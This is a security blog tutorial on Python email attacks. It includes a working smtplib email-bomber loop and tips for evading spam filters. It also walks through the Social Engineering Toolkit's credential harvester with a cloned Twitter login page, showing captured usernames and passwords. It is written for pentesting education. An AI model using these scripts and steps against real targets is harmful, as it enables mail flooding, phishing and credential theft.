Secure coding

Email-based attacks with Python: Phishing, email bombing and more

Srinivas
December 22, 2020 by
Srinivas

The ability to send emails using an automated software tool such a python script can be useful in performing mass email based phishing attacks. This article discusses how Python can be used to perform email based attacks such as sending mass emails. In addition to it, we will discuss the Social Engineering Toolkit (SET), which is a tool written in Python.

Learn Python for Pentesting

Learn Python for Pentesting

Build your Python pentesting skills with four hands-on courses courses covering Python basics, exploiting vulnerabilities, and performing network and web app penetration tests.

Can Python-based tools be used for phishing?

Python is a scripting language with great community support. Because of this heavy community support, several offensive tools have been developed in Python. For the same reason, it will also be easier to develop python based offensive tools even for beginners. Phishing is no different. There are several python based tools developed for phishing attacks. It is possible to send sophisticated phishing emails using Python. Social Engineering Toolkit(SET) by Sensepost is a great example of Python based phishing tools. The Social Engineering Toolkit comes preinstalled with Kali Linux and we will discuss some features of Social Engineering Toolkit in a later section of this article. 

What is a Python email sender?

A python script that can send emails is generally termed as python email sender. Python comes with great support for sending emails. Without requiring additional installations, we can use the built-in module available in its standard library for sending emails via SMTP. 

The following line can be used to import the smtplib module which gives us the ability to send emails.

import smtplib

 

In all our examples in this article, we will use gmail as an example. By default Google doesn't allow us to connect to a gmail account to send emails and thus the following step is required before proceeding further. 

Access the following URL using the google account we want to send emails from.

https://myaccount.google.com/lesssecureapps

 

Enable the button as shown in the following figure.

Now, the following python script can be used to send an email from this email id.

import smtplib

subject = 'Python Email'

body = 'This email is sent using python'

message = f'Subject: {subject}\n\n{body}'

server = smtplib.SMTP_SSL('smtp.gmail.com', 465)

server.login("username", "password")

server.sendmail(

  "from email address", 

  "to email address", 

  message)

server.quit()

 

Just make sure that highlighted fields are appropriately replaced with actual values. Running this script will send an email to the email address specified in To field. In the following figure, we can verify that the email has been successfully delivered.

What is a Python email bomber?

According to Wikipedia, “an email bomb is a form of net abuse consisting of sending large volumes of email to an address in an attempt to overflow the mailbox, overwhelm the server where the email address is hosted in a denial-of-service attack (DoS attack) or as a smoke screen to distract the attention from important email messages indicating a security breach”.

A python program that is capable of sending large volumes of emails to flood the victim is termed as email bomber. Writing a simple email bomber in python is as simple as keeping the program shown earlier in a loop. While, this is simple to develop; it is also simple to get caught by spam filters due to its simplicity. Because of this, we will need to employ various other techniques such as using time delay, sending from a trusted source etc to avoid detection.

The following script shows an example of a simple email bomb that sends 10 emails to the specified email address. The number in the while loop can be increased to send more emails, but this proves the point.

import smtplib

subject = 'Python Email'

body = 'This email is sent using python'

message = f'Subject: {subject}\n\n{body}'

server = smtplib.SMTP_SSL('smtp.gmail.com', 465)

server.login("username", "password")

i = 1

while i < 11:

    server.sendmail(

      "from email address", 

      "to email address", 

      message)

    i += 1

server.quit()

 

Once the script is run, we can verify if the emails are delivered. 

As we can notice, the emails have been delivered successfully. In this case, the from and to emails are the same. But it works the same way even when they are different. 

Learn Python for Pentesting

Learn Python for Pentesting

Build your Python pentesting skills with four hands-on courses courses covering Python basics, exploiting vulnerabilities, and performing network and web app penetration tests.

Python, phishing and social engineering (SET): understanding the risks

As mentioned earlier, the Social Engineering Toolkit is a useful toolset that can be used for phishing and social engineering attacks. This tool kit is completely written in python and comes with a great set of features. Sending mass emails, phishing websites and payload creation are some of the features that are worth noting. Let us understand how SET can be used to conduct a simple phishing attack. 

First, we can clone and install social engineering toolkit using the commands shown below.

git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/

cd setoolkit

pip3 install -r requirements.txt

python setup.py

 

Once the installation is successful, we can launch the toolkit using the command shown below.

# setoolkit

 

This will show the following menu.

Select from the menu:

   1) Social-Engineering Attacks

   2) Penetration Testing (Fast-Track)

   3) Third Party Modules

   4) Update the Social-Engineer Toolkit

   5) Update SET configuration

   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

 

Choosing 1 in the preceding menu will show the menu for Social-Engineering attacks, which looks as follows.

Select from the menu:

   1) Spear-Phishing Attack Vectors

   2) Website Attack Vectors

   3) Infectious Media Generator

   4) Create a Payload and Listener

   5) Mass Mailer Attack

   6) Arduino-Based Attack Vector

   7) Wireless Access Point Attack Vector

   8) QRCode Generator Attack Vector

   9) Powershell Attack Vectors

  10) Third Party Modules

  99) Return back to the main menu.

set> 2

 

We are interested in setting up a phishing attack using a fake web form. So, choosing 2 in the preceding menu shows the options relevant to it.

  1) Java Applet Attack Method

   2) Metasploit Browser Exploit Method

   3) Credential Harvester Attack Method

   4) Tabnabbing Attack Method

   5) Web Jacking Attack Method

   6) Multi-Attack Web Method

   7) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3

 

Within Website Attack vectors, there are several attacks possible. In this example, we will use the Credential Harvester Attack Method to grab credentials from victims using a fake login page. So, choose 3.

  1) Web Templates

   2) Site Cloner

   3) Custom Import

  99) Return to Webattack Menu

set:webattack> 1

 

We can choose existing Web Templates or clone a site.  Let us choose option 1 to use a template that is available within SET. This will also pick the IP address for the POST back as shown below.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.110]: 

 

If this IP address is incorrectly picked, we can manually set one. The next step would be to choose a Website template from the list below.

  1. Java Required

  2. Google

  3. Twitter

set:webattack> Select a template: 3

 

In this case, we are choosing Twitter. Once done, everything will be set and we should be ready to send our link to the fake login page to the victims by various means such as sending emails.

[*] Cloning the website:                                                                                                                                                                                                   

[*] This could take a little bit...                                                                                                                                                                                        

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.                                                                                   

[*] The Social-Engineer Toolkit Credential Harvester Attack

[*] Credential Harvester is running on port 80                                                                                                                                                                             

[*] Information will be displayed to you as it arrives below:    

 

When the victim visits the IP address (or the domain name), the following page appears.

If credentials are entered, they will be posted back in the SET console as highlighted below.

192.168.1.92 - - [20/Dec/2020 03:07:13] "GET / HTTP/1.1" 200 -

[*] WE GOT A HIT! Printing the output:

POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=testuser                                                                                                                                                         

POSSIBLE PASSWORD FIELD FOUND: session[password]=hackmeifyoucan                                                                                                                                                            

PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52                                                                                                                                                         

PARAM: scribe_log=                                                                                                                                                                                                         

POSSIBLE USERNAME FIELD FOUND: redirect_after_login=                                                                                                                                                                       

PARAM: authenticity_token=dba33c0b2bfdd8e6dcb14a7ab4bd121f38177d52                                                                                                                                                         

[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.   

 

Social engineering toolkit is a powerful toolset for anyone to perform social engineering attacks. The powerful features it brings along with the malicious payloads is surely a danger if it is used maliciously. User education through internal phishing campaigns is one of the effective ways to prevent such attacks.

Learn Python for Pentesting

Learn Python for Pentesting

Build your Python pentesting skills with four hands-on courses courses covering Python basics, exploiting vulnerabilities, and performing network and web app penetration tests.

Sources

Srinivas
Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com